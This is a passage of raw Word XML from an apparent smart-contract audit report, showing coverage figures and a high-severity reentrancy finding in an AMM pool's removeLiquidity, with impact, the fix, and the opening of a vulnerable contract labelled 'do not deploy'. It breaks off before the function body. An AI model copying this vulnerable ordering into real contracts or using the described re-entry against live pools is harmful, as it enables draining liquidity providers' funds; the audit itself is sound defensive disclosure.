        <w:t xml:space="preserve">ProtocolAccessNFT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x8118f9ABB3Fc47bdB107cBFe9Ef170A6D142000E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2047" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Deployer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x9b4fFf440Ab7422798ff47713340C7d3125bf33b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2048" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test Coverage Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2049" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>118 tests passed, 0 failed, 0 skipped across 21 test suites (forge test --gas-report).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA204A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>forge coverage --report summary (production contracts only):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA204B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lines: 98.10% (414/422)   |   Statements: 96.76% (448/463)   |   Branches: 76.92% (60/78)   |   Functions: 96.88% (93/96)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA204C" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key contracts at 100% line coverage: AMMPool, PoolFactory, ChainlinkPriceFeed, GovernanceToken, LPToken, ProtocolAccessNFT, UpgradeableProtocolConfig V1/V2, MathUtils, YieldVault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA204D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uncovered branches (76.92%) are limited to edge-case revert paths in AMMPool (72%) and ProtocolGovernor (0% branch — one untriggered internal path). The branch gap does not affect security posture of the critical lending and vault code, both of which exceed 83% branch coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204A4D0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>S-01 — Reentrancy in AMMPool.removeLiquidity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57337775" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> High</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> contracts/amm/AMMPool.sol — removeLiquidity (historical vulnerable ordering; fixed in current tree ~lines 63–84)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7AB0AC" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8A946" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">In the vulnerable revision, removeLiquidity computed pro-rata amountA and amountB, </w:t>
        <w:lastRenderedPageBreak/>
        <w:t>then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>transferred assets to msg.sender before burning LP tokens and decrementing reserveA / reserveB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>. For ERC-20 pairs, a malicious receiver could implement tokensReceived / hook logic (or use a helper contract) to re-enter removeLiquidity or swap while reserves still reflected the pre-withdrawal state, withdrawing more than their LP share. For native-ETH pairs (if supported via receive/fallback), the classic reentrancy pattern applies symmetrically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2C6C2" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>The production fix applies the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Checks-Effects-Interactions (CEI)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> pattern: burn LP, update reserves, then transfer out, wrapped in OpenZeppelin nonReentrant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EFE2A2" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD638BE" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Drain of pool reserves beyond rightful LP share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174BAD57" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Broken x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>y=k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> invariant and insolvency for remaining LPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D458DB0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Cascading bad debt if pool tokens back lending markets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4EC576" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1594ACF0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Proof of Concept — vulnerable contract (illustrative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FCDCA2" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>// SPDX-License-Identifier: MIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A91C6C" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>pragma solidity ^0.8.24;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B458D0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C00DE3" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {IERC20} from "openzeppelin-contracts/contracts/token/ERC20/IERC20.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE18DA4" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {LPToken} from "../token/LPToken.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B038DB0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525F9338" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>/// @dev VULNERABLE — do not deploy. ETH/tokens sent before state update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379FB5F8" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>contract AMMPoolVulnerable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514B0C8" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    IERC20 public immutable tokenA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE994A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    IERC20 public immutable tokenB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DB5AF0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    LPToken public immutable lpToken;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C85BA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E2F090" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint256 public reserveA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48337C6F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint256 public reserveB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A398A09" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7161B3" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    constructor(address _tokenA, address _tokenB) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BDCF30" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        tokenA = IERC20(_tokenA);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2695D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        tokenB = IERC20(_tokenB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50D11B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        lpToken = new LPToken(address(this));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072B4C1" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D0F95" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9B74D7" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    function removeLiquidity(uint256 liquidity) external returns (uint256 amountA, uint256 amountB) {</w:t>
      </w:r>
    </w:p>
